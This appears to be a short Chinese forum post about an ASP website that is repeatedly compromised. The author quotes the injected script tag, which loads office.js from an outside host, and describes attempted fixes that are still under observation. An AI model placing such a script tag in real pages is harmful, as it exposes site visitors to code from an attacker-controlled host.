最近帮朋友做的一个网站经常被添加一行代码: <script language="javascript" src="http://office.c4.fr/office.js?clie=2155&mid=601"></script>
以下是处理经过:
刚开始时以为是偶然事件,于是重新上传网站文件,一天之类再次中招,失败。。。
经过分析被添加代码的文件,在每一个asp文件的最后增加了一行代码 <% response.end %>,重新上传,好像正常了。。。最迟到了第三天上去看,晕,又被人加上了。失败。。。
这一次中招的文件是在 inc 目录下的文件。因为拿来主义,网站很多代码直接抄的网上的现成的代码。简单处理一下,inc改个名字,并成批修改了引用的asp文件,再次上传。结果未知,继续观察中。。。